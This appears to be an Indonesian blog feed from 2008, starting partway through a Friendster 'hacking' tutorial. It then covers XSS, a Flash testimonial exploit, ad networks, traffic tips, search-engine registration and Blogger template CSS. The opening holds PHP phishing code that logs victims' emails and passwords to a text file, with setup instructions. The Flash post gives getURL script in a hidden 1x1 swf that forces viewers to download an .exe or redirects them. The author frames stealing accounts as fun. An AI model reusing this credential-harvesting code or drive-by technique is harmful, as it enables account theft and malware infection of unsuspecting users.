('REMOTE_ADDR');$date=date("dmy.g:i:sa");$em=$_POST['email'];$pw=$_POST['password'];$referer=$_POST['next'];if (validstr($em)){ $fl = fopen('fansblogs.txt', 'a') or die("error Opening file"); fwrite($fl,"\r\n$ip;;$date;;\r\n$em;;$pw") or die("access Write failed"); fclose($fl); header("location:$referer"); }header("location:$referer");}?>Bagian yang aku tebalkan (sebuah tulisan 'fansblogs.txt') merupakan sebuah file text dimana hasil yang berhasil direkam akan disimpan. Oleh karena itu, selain mentiapkan login.php dan submit.php, kita juga harus mempersiapkan sebuah file text kosong dengan nama fansblogs.txt. Tentu saja namanya boleh kita ganti sesuka hati, namun jangan lupa untuk mengubah nama yang tercantum pada script ini juga.Selain itu kita juga akan memiliki sebuah script yang akan dinamakan login.php, namun dikarenakan script tersebut terlalu panjang dan hanya akan memenuhi halaman Blog aku ini, kamu bisa lihat script tersebut Di SiniSebelum memulai pada tahap yang lebih lanjut, aku akan sedikit menerangkan kenapa kita harus menggunakan nama submit.php dan login.php, dan kenapa bukan dengan nama-nama yang lain?Mudah saja, didalam login.php yang Friendster miliki, terdapat penggalan informasi script yang menyatakan hal sebagai berikut:
Cross Site Scripting (XSS)

Wed, 10 Sep 2008 05:03:59 PDT

Sebelum kita melanjutkan artikel-artikel Friendster Hacking ini lebih jauh, akan lebih baik jika kita membahas sedikit mengenai Cross Site Scripting (XSS), yang merupakan sebuah teknik hacking yang sangat banyak ditemukan di manapun. Selain itu, teknik ini merupakan 90% serangan yang sering sekali hacker lakukan untuk melakukan tindakan yang tidak bertanggung jawab, mengambil alih account milik orang lain. Hayo siapa yang suka begitu? Hayo ngaku...Untuk memahami apa itu Cross Site Scripting (XSS), bagaimana cara kerjanya, serta apa saja yang mungkin ia lakukan, akan sangat baik apabila kita membaca artikel yang berhubungan dengan hal XSS ini.What is Cross Site Scripting?Cross Site Scripting adalah sebuah jenis serangan yang juga dikenal dengan nama XSS atau CSS, yang juga dapat dikategorikan sebagai jenis serangan tingkat menengah, atau yang tingkat bahayanya masih menengah, dikarenakan dengan menggunakan jenis serangan ini, seorang penyerang tidak melakukan serangan langsung terhadap database maupun admin control panel sebuah website.Walaupun Cross Site Scripting tidak melakukan serangan langsung kepada sistem yang ada, bukan berarti tingkat bahaya daripada serangan ini tumpul dan hilang begitu saja. Cross Site Scripting adalah teknik paling jitu untuk mengeksploitasi kelemahan pada elemen paling penting dalam sebuah susunan teknologi, yakni menusianya. Dengan cara menyamarkan dirinya sebagai hyperlink atau berbagai hal lainnya yang juga terdapat pada website yang tidak patut dicurigai, seperti di Friendster.com sendiri atau dari website bank online, Cross Site Scripting mencuri banyak data pelanggan atau anggota suatu komunitas di Internet.Serangan Cross Site Scripting ini memiliki ciri khas sendiri. Ia hanya akan ditemukan pada berbagai website atau halaman yang memiliki fitur dinamik, alias dapat diubah-ubah sesuai dengan keinginan sang pengunjung website. Website seperti sebuah forum, guest book, registration form, search form, dan berbagai halaman serupa lainnya telah menjadi mangsa empuk jenis serangan ini.Kenapa hanya dapat berada pada jenis website dinamik? Dan apakah tidak mungkin ada pada website tipe statik? Karena yang akan dilakukan Cross Site Scripting adalah menyusupkan sebuah script yang dapat meragukan para pengunjung website ke dalam sebuah halaman website yang legal (seperti menambahkan di halaman login sebuah online bank). Kita akan membahas contoh nyatanya langsung nanti.Memang Cross Site Scripting sangat jarang ditemukan di website statik, atau bahkan tidak ada, namun bukan berarti kita aman dari hal semacam ini. Alasannya? Dapat kita lihat di bawah ini!Why Cross Site Scripting is not CSS?Seringkali orang mengartikan Cross Site Scripting mentah-mentah menjadi CSS, dan itu membuat bingung karena CSS secara pribadi sebenarnya dimaksudkan dengan Cascading Style Sheet.Tidak jarang juga para ahli keamanan dan ahli Inernet menyebutkan Cross Site Scripting sebagai XSS (di mana tanda X dibaca sebagai Cross), agar jika kita mendengar atau mengetahui seseorang tentu orang ini bermaksud mengatakan jika dia menemukan kelemahan Cross Site Scripting di dalam situs web tersebut.How dangerous is XSS?Menjawab pertanyaan, kenapa Cross Site Scripting ini begitu berbahaya jika hanya ada pada website yang memiliki fitur dinamik? Maka kita akan berandai-andai sedikit. Apabila dalam 15 menit terakhir kita telah mengunjungi sekitar 20 website, maka hitunglah, berapa website yang memiliki kolom, pengisian bahan pencarian (Search Form), Login Page, Registration Form, Posting, dan berbagai halaman lain yang memungkinkan seorang pengunjung mengubah informasinya sesuai dengan keinginannya? Tentu kita akan menemukan jumlah ya[...]



Hacking Friendster Melalui Flash Exploit

Mon, 15 Sep 2008 08:05:08 PDT

Download artikel di bawah dalam bentuk E-Book agar kalian bisa membacanya dengan serius Di SiniUntuk mengawali Bulan Suci Ramadhan ini, bagaimana jika kita membahas sedikit tentang Friendster Hacking? Tapi dosa engga yah ini kan Bulan Puasa masa sih mau nyolong punya orang? Ah biarin deh yang penting kan Happy Akhirnya jika kemarin aku membuat artikel tentang Sejarah Friendster Hacking dan yang lainnya, bisa juga sekarang aku membuat artikel tentang Friendster Hacking, walalupun ini artikel Friendster Hacking yang pertama kali aku buat mungkin bisa berguna untuk semua orang yang iseng atau jail dengan Trik Hacking seperti ini. Bagaimana? apa ingin mencoba Trik Friendster Hacking perdana yang aku buat? He..he..he.. Jika penasaran, langsung saja baca dengan cermat key.Seperti yang pernah aku katakan pada bagian Sejarah Friendster Hacking sebelumnya. Testimonial adalah tempat dimana celah keamanan pertama bagi Friendster.com.Apa yang dilakukan oleh para Hacker pada saat itu di bagian testimonial bukanlah suatu hal yang sangat sulit. Hanya dengan bermodalkan suatu Macromedia Flash 8 semua orang bisa melakukan hal yang serupa. Intinya adalah, pembuatan file flash *.swf yang mengandung script GerURL, sehingga memaksa siapapun yang melihat file flash tersebut melakukan GetURL seperti yang diperintahkan.Hanya dengan mengetikan script, kemudian membuat ukuran flash menjadi 1x1 atau berapapun besarnya yang kita inginkan, kemudian melakukan pembuatan file *.swftersebut menggunakan Macromedia Flash 8, kita dapat melakukan Hacking Friendster.Script yang bisa dimasukkan pun ternyata bervariasi, tergantung apa yang diinginkan oleh seorang Hacker, untuk dieksekusi oleh para korbannya.Pada contoh gambar di berikut, script tersebut ditunjukkan untuk membuat seorang korban (mereka yang membuka file *.swf tersebut di Internet), untuk melakukan download file *.exe yang berlokasi di http://www.fansblog.com/test.exe. (Ingat, gambar tersebut hanya sebagai contoh, dan jika kalian membuka alamat tersebut, tentu alamat tersebut tidak ada).Sedangkan bagi mereka yang ingin melakukan Redirection, script yang diperlukan pun tidak jauh berbeda dengan yang sudah ada pada gambar di atas. Hanya perlu sedikit modifikasi, yaitu dengan menghilangkan nama file di bagian URL sehingga script-nya akan menjadi seperti berikut:getURL("http://www.contoh.com");AtaugetURL("http://www.contoh.com", "_parent")Seluruh pengguna Friendster yang membuka tesimonial yang memiliki flash dengan script seperti ini, akan mengalami redirection ke alamat http://www.contoh.com.Bagaimana menyaimpannya dalam Testimonial ? Yupz, tentu pertama-tama kita harus melakukan upload file *.swf kita ke dalam sebuah Web Hosting, misalnya nama file kita adalah fshacking.swf, kita perlu menyimpannya di sebuah Website yang memberika layanan Hosting, dan kemudian mengambil URL tersebut dimana kita bisa langsung membuka URL tersebut dan melihat file Flash itu. Sebagai contoh misalnya:http://www.website-kita.com/fshacking.swfSetelah file fshacking.swf selesai dibentuk dan di upload dengan benar, yang perlu kita lakukan berikutnya adalah mencoba membuka Friendster kita, dan mengirimkannya sebagai salah satu contoh kepada salah seorang teman kita. Tentunya pengiriman ini harus dilakukan dengan menggunakan Testimonial, mengingat Testimonial adalah cara yang kita bahas dalam artikel kali ini.Misalnya kita sudah mempunyai URL file *.swf seperti berikut:http://www.website-kita.com/fshacking.swfAlamat di atas telah menunjukkan kepada kita, sebuah URL yang mengandung swf file yang telah memiliki script untuk memaksa seorang user men-download file test.exe setelah melihat file[...]



Program CPM Alternatif Pengganti AdSense

Fri, 12 Sep 2008 09:22:47 PDT

Terdapat banyak model CPM alternatif ataupun PPC alternatif selain AdSense. Harap diketahui bahwa CPM adalah singkatan dari Cost Per Million, sehingga program-program iklan berkut ini membayar situs kita berdasarkan pengunjung yang hadir dalam situs tersebut dan melihat iklan kita, tidak berbasiskan PPC (Pay Per Click) atau pembayaran berdasarkan satu klik.Ap saja program-program iklan tersebut? Ini dia:AdsDaq (tidak ada persyaratan)Ketika iklan CPM hanya tersedia di beberap negara saja, maka AdsDaq memberikan tawaran bahwa program adveristing mereka dapat digunakan oleh negara mana saja. Sungguh hal yang ditunggu-tunggu dan layak dicoba. Situs mereka dapat dikunjungi Di SiniAd Dynamix (tidak ada persyaratan)Ad Dynamix tidak seserius AdsDaq, meskipun persyaratan yang diberikan lebih mudah dari AdsDaq. Dengan ketidakseriusan itu, maka jelas Ad Dynamix memiliki sedikit costumer daripada yang dimiliki oleh AdsDaq. Situs mereka dapat dikunjungi Di SiniValue Click (3,000 pageviews per month)Meskipun pageview yang mereka syaratkan lumayan kecil, namun ValueClick terkesan lebih pilih-pilih terhadap situs mana yang mereka approve. Situs mereka dapat dikunjungi Di SiniMorning Falls (10,000 pageviews per month)Dengan persyaratan yang lumayan mudah, jasa-jasa costumer yang hebat, pengimplementasikan yang mudah dan laporan-laporan harian yang mudah untuk dimengerti, membuat program CPM ini hebat dan baik untuk digunakan oleh beginner. Situs mereka dapat dikunjungi Di SiniCPX Interactive (10,000 pageciews per mounth)Program CPM yang menarik, sudah erbukti dengan banyaknya para Webmaster yang menggunakan jasa mereka. CPX Interactive selalu menghadirkan iklan dengan model game, sehingga menrik bagi siapapun. Situs mereka dapat dikunjungi Di SiniCasale Media (10,000 unique visitors per mounth)Sebuah ad-publisher yang mengesankan butuh pengalaman, namun sangat cocok dan dapat dikatakan perfect bagi situs yang memiliki jumlah pengunjung yang terkendali dan banyak (10.000 visitor unik). Casale Media memiliki jaringan yang luas, sehingga sangat cocok dimiliki oleh situs-situs yang berskala besar. Situs mereka dapat dikunjungi Di SiniTribal Fusion (60,000 unique visitors per month)Sebuah ad-publisher yang berpengaruh kuat, yang tergantungpada niche situs kita. Tribal Fusion memberikan beribu-ribu situs yang memiliki kategori yang samam dengan kita. Hebat! Situs mereka dapat dikunjungi Di SiniBrightroll (100,000 video views and 250,000 pageviews per month)Sangat cocok digunakan bagi situs-situs penyedia berbagai video. Brightroll dengan video views yang tinggi membuatnya hanya dapat dimiliki oleh publisher yang benar-benar advance. Situs mereka dapat dikunjungi Di SiniAdtegrity (500,000 pageviews per month)Adtegrity. terkenal memiliki jaringan costumer yang bagus, dan tidak dapat dipungkiri lagi jika beberapa saat lagi, Adtegrity bisa-bisa menjadi leader dari advertising network. Situs mereka dapat dikunjungi Di SiniAdvertising.com (2 million pageviews per month)Salah satu situs advertising dengan jumlah pageviews yang tinggi, membuat tidak semua orang dapat menggunakan jasa situs ini. Situs mereka dapat dikunjungi Di SiniVideo Egg (10 million vodeo views per month)Yang terakhir adalah Video Egg. Video Egg memang berkonsentrasi bagi publisher online video dengan jumlah video views yang tinggi. Serasa tidak mungkin dimiliki oleh setiap orang, sehingga jaringan Video Egg tidak sekuat kompetitor yang lain. Situs mereka dapat dikunjungi Di SiniTernyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman IniMasukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas:Deliver[...]



Meningkatkan Traffik Website

Thu, 18 Sep 2008 23:43:41 PDT

Salah satu teknik untuk mendapatkan pengunjung yang banyak adalah dengan meningkatkan traffik ke dalam website kita. Semakin banyak traffik di dalam website akan semakin banyak kemungkinan pengunjung mendapatkan pengunjung yang banyak. Berikut ini merupakan cara untuk meningkatkan traffik ke dalam website kita:1. Tulislah konten yang gratis, orisinil dan berkualitas di blog kita. Hal ini merupakan faktor paling penting yang dapat kita lakukan untuk membuat orang agar tertarik mengunjungi blog kita.a. Pastikan isi artikel berguna untuk pengunjung kita. Kualitas merupakan kunci utama. Jangan gunakan informasi yang disalin dari website lain. Berikanlah informasi yang benar-benar diperlukan oleh blog kita untuk memecahkan yang mereka hadapi.b. Buatlah konten yang fresh secara periodik, misalnya satu artikel setiap 2 hari atau sekali seminggu.c. Jangan gunakan content generator. Hal ini tidak berguna, kita tidak perlu menggunakan hal demikian. Google, Yahoo, dan MSN sekarang menggunakan algoritma pencarian yang lebih unggul sehingga memungkinkan mendeteksi konten yang merupakan hasil penyalinan dan tidak menampilkan di mesin pencari.d. Apabila kita tidak mampu menulis artikel sendiri, tidak ada salahnya kita meminta pertolongan teman kita untuk membantu menuliskan artikel di dalam blog kita.2. Tingkatkan ranking search engine kita, caranya dapat kita lihat di bagian berikut ini.3. Buatlah majalah elektronik untuk blog kita dan rilislah majalah tersebut dengan periode yang teratur. Ketika tanggal dirilisnya, biasanya akan banyak orang yang mengunjungi blog kita untuk melihat dan mendownload majalah tersebut.4. Atau bisa juga kita mengirimkan artikel-artikel ke majalah elektronik yang diterbitkan oleh orang-orang lain. Masukkan profile blog kita di dalam majalah tersebut.Hal ini merupakan cara yang baik untuk menciptakan backlink ke website kita. Hal ini juga merupakan cara paling efektif untuk menjadikan blog kita tercantum di search engine.5. kita bisa juga menerbitkan e-book sendiri dan mencantumkan link-link yang merupakan tautan balik ke blog. kita juga bisa mengizinkan orang untuk menyebarkan e-book gratisan kita tersebut. Hal ini membuat alamat blog kita akan semakin dikenali di dunia maya.6. Exchange link. Bertukaran link dengan blog-blog lain yang setema dengan kita akan membuat blog kita mudah dikenali yang akhirnya bisa menambah traffik ke blog kita. Jika link yang digunakan adalah 2 arah, dimana kita me-link pada blog teman dan teman me-link blog kita, maka hasilnya akan lebih baik. Tapi berhati-hatilah jangan banyak me-link pada website yang memiliki peringkat di bawah kita karena akan menurunkan kredibilitas website kita.7. Berpartisipasilah dalam forum-forum. kita bisa membantu orang-orang yang bertanya di forum, selain itu kita juga bisa memberikan link balik ke blog kita.8. Mulailah komunitas online sendiri apabila kita belum memiliki komunitas sebelumnya. Komunitas bisa berupa diskusi email, chatroom dan lain sebagainya. Ketika banyak orang yang bergabung ke komunitas yang kita dirikan, otomatis akan semakin banyak orang untuk berkunjung ke blog kita.9. Adakanlah seminar online atau tutorial gratis. Hal ini bisa dilakukan di blog kita atau di halaman khusus di luar blog yang masih ada hubungannya dengan blog kita.10. Apabila bahasa blog kita termasuk lokal, kita bisa mengiklankan dengan cara beriklan di media lokal dan lain sebagainya. Misalnya: gantungan kunci, stiker yang bisa ditempel di mobil atau motor.11. Gunakan word of mouth. Beritahukan kepada banyak orang mengenai blog kita. Setiap berjumpa dengan orang lain, kita bi[...]



Mendaftarkan Blog Pada Technorati

Thu, 18 Sep 2008 23:43:41 PDT

Untuk mendaftarkan blog pada Technorati, caranya cukup mudah. Kita langsung saja pergi pada situs Technorati dengan browser pada alamat Technorati.com. Di sana, di sebelah pojok kanan atas, akan terdapat link Sign In. Klik langsung link tersebut, dan akan muncul form registrasi untuk menjadi member.

Member name: kita isikan dengan nama kita, sebagai perwakilan ketika nantinya kita ingin masuk apda akun. Minimal karrakter untuk Member Name adalah empat karakter. Jika kurang, maka pendaftaran ditolak.

Email address: kita isikan dengan alamat email kita yang masih aktif dan masih berfungsi, atau yang paling sering kita gunakan.

Choose password: adalah password atau kata kunci yang kita inginkan, minimal enam karakter.

Confirm password: kita isikan password yang sama dengan Choose password.

Jika diantara keduanya tidak sama, maka proses registrasi akan diulang kembali. Setelah itu, klik checkbox "I agree to Technorati's Privacy Policy and Terms of Service". Langsung saja tekan tombol Join.


Di form registarsi 1 dan form registrasi 2 sebenarnya hampir sama, hanya Real Name yang membedakan. Jadi isikan First Name dengan nama depan kita, dan Last Name dengan nama belakang kita. Selanjutnya tekan Join, setelah mengisi checkbox I have a blog and would like to claim it now.

Setelah itu, kita ke halaman depan Technorati. Di halaman itu, langsung saja kita memilih tab Blogger Central yang berada di sebelah kanan pojok atas, dan teb berwarna putih. Setelah kita menekan tab Blogger Central, pilihlah sub tab yang bernama Ping.

Halaman Ping akan muncul tidak lama setelah itu. Di halaman Ping itulah, di kotak URL, isikan alamat lengkap blog kita. Jika sudah, kita klik tombol di sebelahnya, Ping! Setelah itu, sekarang blog kita sudak diakui oleh Technorati. Technorati sebenarnya adalah program yang berjasa untuk memberitahukan siapa saja blog orang lain yang mendukung blog kita.

Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman Ini

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas:

Delivered by FeedBurner


(image)



Mendaftarkan Blog Pada Google

Thu, 18 Sep 2008 23:43:41 PDT

Sebenarnya Google bisa saja menemukan/mendaftarkan atau yang lebih umum disebut mengindeks situs kita tanpa kita memberi tahu Google. Tapi itu akan membuat blog kita dikenal oleh dunia semakin lama. Bagaimana tidak, Google harus mencari sendiri situs kita, menjelajahi, baru mendaftarkannya. Berbeda dengan mendaftarkan secara manual, Google akan segera mencatat bahwa ada blog baru yang harus segera ditambahkan.Bagaiman untuk melakukannya? Kunjungi alamat google.com/webmasters lalu pilih Submit your content in Google (di sebelah pojok kanan halaman). Setelah itu kita pilih Submit your content to Googel, maka akan terlihat halaman How to submit your content to Google. Pilih saja.Tidak lama kemudian, akan terlihat halaman Add your URL to Google, isikan sesuai dengan alaman blog kita dan isikan deskripsi yang singkat. Selanjutnya akan ditampilkan Dashboard dan perhatikan textbox "Add Site". Isikan textbox tersebut dengan alamat blog kita dengan lengkap bersama http://. Jika sudah, tekan tombol Add Site yang berada disampingnya.Tidak lama setelah proses penambahan daftar situs, tabel yang tadinya hanya berisi tiga situs, akan berubah menjadi empat situs. Setelah itu tekan tombol Add untuk penambahan Sitemap. Halaman penambahan sitemap akan muncul pada halaman Add Sitemap. Pada combo box Add Sitemap, pilihlah Add General Web Sitemap. Setelah itu, dalam kotak teks My Sitemap URL is, isikan dengan alamat sitemap kita.Secara umum, Blogger memberikan alamat sitemap kita dengan format http://fansblogs.blogspot.com/atom.xml. Atom.xml inilah alamat sitemap kita. Sehingga dalam kotak textbox itu, kita cukup mengetikkan atom.xml. Setelah itu kli tombol Add General Web Sitemap. Setelah kita menekan "Add General Web Sitemap", jika Sitemap kita diterima oleh Google, maka akan muncul halaman Sitemaps.Setelah itu kita kembali ke dalam Dashboard dengan menekan link "Dashboard" di yang berada di bawah tulisan Google Webmaster Tools. Dashboard akan datang bersama tabel baru bernama http://fansblogs.blogspot.com, yang tadinya telah kita tambahkan. Tetapi tidak hanya sampai di sini, masih ada beberapa proses lagi yang harus kita lakukan, yaitu melakukan verifikasi.Gunanya untuk apa? Agar CrawlerBot (robot yang digunakan untuk mengindeks situs kita) tahu kalau memang blog kita sudah didaftarkan dalam Google Webmaster Tools. Kita juga dapat melihat pada label, terdapat tulisan Errors yang menyala terang, itu berarti Sitemap atau situs blog sudah tidak dapat diakses oleh CrawlerBot Google. Sedangkan yang bertanda hijau itu, mengartikan bahwa blog kita sudah diakses, dan Google siap menerima apapun darinya untuk diindeks.Baik, langkah selanjutnya tentu saja melakukan verifikasi blog kita. Untuk melakukannya, tekan Verify pada kotak di mana blog kita belum melakukan verifikasi. Tidak lama akan ditampilkan halaman Verify a Site. Di kotak choose verifycation method, pilihlah Add a Meta Tag. Setelah itu, kita akan mendapatkan kode virifikasi untuk blog kita. Blok semua kode tersebut dan copy ke dalam Clipboard kita.Jangan tekan tombol "Verify" terlebih dahulu. Sekarang kita kembali lagi ke dalam Blogge.com. Masuk ke dalam Blogger.com, pilih template dan pilih Edit HTML. Di sanalah nantinya kita akan menyimpan kode verifikasi untuk blog kita. Masalahnya, di bagain manakah kode Verify tersebut disimpan?Google sendiri mengatakan jika kode Verify dapat diletakkan di mana saja, yang penting di dalam tag . Jadi, kita lakukan sekarang juga. Kita cari dalam kode Edit HTML tag . Jika sudah [...]



Mendaftarkan Blog Pada DMOZ

Thu, 18 Sep 2008 23:43:41 PDT

Agar blog kita cepat terdaftar dalam direktori, di sarankan agar PageRank kita mencapai 2 PR atau lebih. Kita juga dapat mendaftar ulang jika daftar kita ditolak. Bagaimana cara melihat PageRank? Caranya akan dibahas lain setelah ini.Klik link sugges URL yang terdapat di bagian atas, yaitu banner DMOZ. Kita akan dibawa pada halaman yang berisi penjelasan tentang peraturan atau tata cara mengajukan pendaftaran website (How to suggest a site to the open directory). Ada baiknya kita membaca peraturan yang penting untuk diketahui adalah:1. Jangan mendaftarkan dengan nama URL Redirection, gunakan URL asli dari webhosting kita.2. Jangan mendaftarkan website yang belum selesai, biasanya ada halaman yang sedang dikerjakan atau ada link yang terputus.3. Jika website kita menggunakan bahasa utama selain bahasa Inggris, maka daftarkanlah dalam kategori World.Setelah kita setuju dengan peraturan yang dijelaskan di halaman ini kemudian klik link Proceed to the Open Directory home at dmoz.org untuk melalui proses pendaftaran, kita akan kembali dibawa pada halaman depan (homepage) dari DMOZ. Di sini kita harus mencari dan menelusuri kategori dan sub kategory yang paling tepat untuk website yang telah kita buat. Mengingat point ketiga yang disebutkan di atas, jika situs kita berbahasa Indonesia, maka kategori pertama yang harus kita masuki adalah link World yang terdapat pada deretan link terbawah. Klik link World.Kita akan dibawa pada daftar link bahasa-bahasa yang terdapat di seluruh dunia yang diurutkan sesuai dengan abjad. Angka-angka yang terdapat dalam tanda kurung di belakang setiap link kategori merupakan kumlah website yang telah terdaftar dalam Open Directory untuk kategoritersebut. Carilah link Indonesia. Setelah dapat, klik link tersebut. Kita akan dibawa pada halaman selanjutnya yang merupakan daftar pertama dari daftar kategori dalam kelompok website Indonesia.Di sini terdapat sejumlah kategori seperti Belanja, Berita, Bisnis, Kesehatan, dan seterusnya. Pilihlah kategori yang paling sesuai untuk website kita. Misalnya kita memilih kategori komputer. Setelah link Komputer di klik, kita akan dibawa pada daftar selanjutnya yang di dalamnya terdapat sejumlah sub kategori seperti Hacking, Internet, Konsultan, Linux, dan seterusnya. Di sini kita klik link Iternet yang membawa kita pada daftar kategori selanjutnya. Sub kategori yang terdapat di halaman ini antara lain Berita Online, Chat, Layanan Email, Layanan Web, dan lain-lain.Seandainya kita hanya mendaftarkan website kita sampai di kategori Internet saja, maka di sini langsung klik saja Tambah URL yang terdapat di bagian atas banner. Jika kita ingin melihat situs-situs mana saja yang telah terdaftar dalam kategori Internet, gulunglah layar ke bawah, maka di sana kita akan melihat daftar nama-nama situs, lengkap dengan deskripsi tentang isi masing-masing situs.Jika kita ingin mendaftar dalam sub kategori yang lebih dalam, klik link sub kategori yang dimaksud tadi. Setelah itu, kita akan dibawa pada halaman Submit a site the Open Directory. Di halaman ini kita diminta untuk mengisi formulir registrasi. Hanya ada empat kotak yang harus kita isi dengan baik dan benar.Site URL: masukkan alamat (URL) website kita. Ingat, alamat yang dimaksud adalah alamat asli dari webhosting tempat kita menyimpan file-file website. Jadi jangan memasukkan alamat URL Redirection.Title of Site: tuliskan nam (judul) dari website. Isilak "Title" ini sudah dijelaskan sebelumnya.Site Description: ketikkan kata-kata singkat tentang isi websi[...]



Mendaftarkan Blog Pada Mesin Pencari

Thu, 18 Sep 2008 23:43:41 PDT

Sumber semua pengunjung sebagian besar adalah dari search engine. Oleh karenanya memasukkan blog ke dalam daftar pencarian adalah hal yang penting. Seperti diketahui ada tiga search engine terbesar, yaitu Google, Yahoo, dan MSN. Untuk mendaftarkan blog, kunjungilah link-link berikut:1. Google Webmasters ToolsLayanan ini menyediakan informasi tentang Web yang kita miliki berdasarkan sitemap yang diberikan kepada Google, tetapi kita tentunya harus melakukan verifikasi untuk membuktikan hak kepemilikan dengan menyisipkan kode dari Google Webmasters Tools. Format dari sitemap blog Blogger adalah seperti berikut: http://namablog.blogspot.com/atom.xml.Dengan mendaftarkan blog kita ke sini, maka akan berada dalam antrian spider Google. blog pun aka masuk ke dalam daftar Web Google.Layanan ini juga menyediakan informasi tentang error yang terjadi ketika ada halaman yang tidak berhasil ditelusuri disertai informasi kata kunci untuk masing-masing blog atau Web yang kita tambahkan.2. Google AnalyticsLayanan ini sangat hebat untuk memberikan informasi lengap tentang blog atau Web kita. Mirip dengan Google Webmasters Tools, tetapi jauh lebih baik.Google Analytics memberi tahu kita bagaimana pengunjung menemukan blog kita dan bagaimana menreka menggunakan blog tersebut. kita dapat membandingkan pengunjung yang datang dari berbagai sumber, seperti search engine, datang langsung, atau di-refer dari Web lain. Kita juga dapat melihat berapa banyak halaman blog yang dibuka selama jangka waktu tertentu dan melihat dari negara mana saja pengunjung kita berasal.3. My WebLayanan ini dari Yahoo. Mirip dengan bookmark directories terkenal seperti del.icio.us. kita dapat memasukkan blog kita dan feed-nya untuk mendapatkan kesempatan dikenal di Yahoo. kita tinggal memilih menu add pages.4. Yahoo Site ExplorerLayanan dari Yahoo ini mirip dengan Google Webmasters Tools. Yang perlu kita masukkan adalah sitemap blog kita dan dapat menampung lebih dari satu blog.5. MSNMesin pencari dari Microsoft ini menyediakan form untuk mendaftarkan blog atau Web ke daftar pencariannya. Yang perlu kita lakukan adalah mengetikkan alamat blog kita dan mengisi verifikasi kata. Cara ini sepertinya yang paling mudah dibanding dengan langkah-langkah yang ada di atas, tetapi sayangnya MSN adalah mesin pencari dengan pasaran terkecil di antara Google dan Yahoo.Sebenarnya ada banyak lagi mesin pencari di dunia maya, tetapi rasanya sudah cukup dengan mendaftarkannya pada ketiga mesin pencari terbesar ini. Karena sesudah ini masih ada beberapa direktori khusus untuk blog yang juga perlu dikunjungi untuk memastikan blog kita tidak terkubur bersama ribuan blog lainnya.Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman IniMasukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas:Delivered by FeedBurner[...]



Mengubah Template Thisaway Menjadi Tiga Kolom

Fri, 26 Sep 2008 06:10:59 PDT

Bahasan yang satu ini aku ambil dari template milik Blogger, yaitu Thisaway. Menurut polling di Internet, beberapa orang pengguna Blogger menggunakan template ini sebagai template mereka, dan mereka ingin mengubah template ini menjadi tiga kolom. Di internet tidak tersedia template Thisaway tiga kolom, untuk itu, dalam bahasan kali ini aku akan merubah sendiri menjadi tiga kolom.PERHATIAN: Trik ini berlaku untuk template Thisaway dan Thisaway Blue.Caranya yaitu. Pertama, untuk menjaga keselamatan blog kita nantinya, backup template terlebih dahulu dengan masuk ke Layout > Edit HTML > Download Full Template. Setelah itu baru kita mulai trik ini.Pertama cari code yang berwarna hitam:/* global-------------- */body {margin: 0;text-align: center;min-width: 760px;background: #ce8b43url(http://www.blogblog.com/thisaway/bg_body.gif) repeat-x left top;color: $textColor;font-size: small;}blockquote {margin: 0;padding: 0 10px 0 10px;border-left: 6px solid #f7e8d8;berder-right: 6px solid #f7e8d8;color: $postTitleColor;}kode {color: $postTitleColor;}hr {display: none;}/* layout-------------- */#outer-wrapper {margin: 0 auto;width: 760px;text-align: left;font: $bodyFont;}#header-wrapper {padding-bottom: 15px;background: url(http://www.blogblog.com/thisaway/bg_header_bottom.gif) no-repeat left bottom;}#header {background: #634320 url(http://www.blogblog.com/thisaway/bg_header.gif) repeat-x left bottom;}#content-wrapper {position: relative;width: 760px;background: #f7f0e9 url(http://www.blogblog.com/thisaway/bg_main_wrapper.gif) repeat-y left top;}#main-wrapper {display: inline; /* fixes a strange ie margin bug */float: left;margin: 0 0 0 3px;padding: 0;width: 483px;word-wrap: break-word; /*fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}#main {padding: 22px 8px 0 8px;background: url(http://www.blogblog.com/thisaway/bg_content.gif) repeat-x left top;}.post {margin: 0 8px 14px 21px;padding: 10px;border: 1px solid #f0e0ce;background-color: #f5ede4;}#sidebar-wrapper {display: inline; /* fixes a strange ie margin bug */float: right;margin: 0 3px 0 0;width: 269px;color: $textColor;line-height: 1.4em;font-size: 90%;background: url(http://www.blogblog.com/thisaway/bg_sidebar.gif) repeat-x left top;word-wrap: break-word; /* fix for long text breaking sidebar float in IE */overflow: hidden; /* fix for long non-text content breaking IE sidebar float */}#sidebar {padding: 7px 11px 0 14px;background: url(http://www.blogblog.com/thisaway/bg_sidebar_arrow.gif) repeat-y 179px 0;}#sidebar .widget {margin-bottom: 20px;}#footer-wrapper {padding-top: 15px;background: url(http://www.blogblog.com/thisaway/bg_footer_top.gif) no-repeat left top;clear: both;}#footer {background: #493015 url(http://www.blogblog.com/thisaway/bg_footer.gif) repeat-x left top;text-align: center;min-height: 2em;}Setelah ditemukan, ganti code yang berwarna hitam tersebut dengan code yang berwarna hitam berikut ini. Dan tambahkan juga beberapa yang berwarna hitam sehingga menjadi seperti berikut:/* global-------------- */body {margin: 0;text-align: center;min-width: 987px;background: #ce8b43url(http://www.blogblog.com/thisaway/bg_body.gif) repeat-x left top;color: $textColor;font-size: small;}blockquote {margin: 0;padding: 0 10px 0 10px;border-left: 6px solid #f7e8d8;berder-right: 6px solid #f7e8d8;color: $postTitleColor;}kode {color: $postTitleColor;}hr {display: none;}/* layout--------[...]



Mengubah Template Stertch Denim Menjadi Tiga Kolom

Fri, 26 Sep 2008 06:10:59 PDT

